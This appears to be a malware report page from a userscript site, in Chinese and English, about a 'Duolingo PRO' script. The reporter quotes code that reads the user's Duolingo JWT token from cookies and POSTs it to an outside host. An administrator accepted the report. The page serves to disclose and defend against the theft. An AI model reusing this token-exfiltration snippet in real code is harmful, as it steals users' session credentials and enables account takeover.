Duolingo PRO 2025-03-23 被举报,原因为:恶意软件或代码

举报者说:

This script grabs the JWT token of duolingo and sends it to a fishy link code below:

let apiURL = "https://api.duolingopro.net";

This is the real payload part


            const response = await fetch(apiURL + "/feedback", {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                    'Authorization': `Bearer ${document.cookie.split(';').find(cookie => cookie.includes('jwt_token')).split('=')[1]}`
                },
                body: JSON.stringify(payload)
            });

此次举报提交后,此脚本已被更新。

此脚本之前已有 1 个被核实或修复的举报。

anonymoushackerIV(被举报用户)已有:

interstellar(被举报用户)已有:

管理员已通过该举报。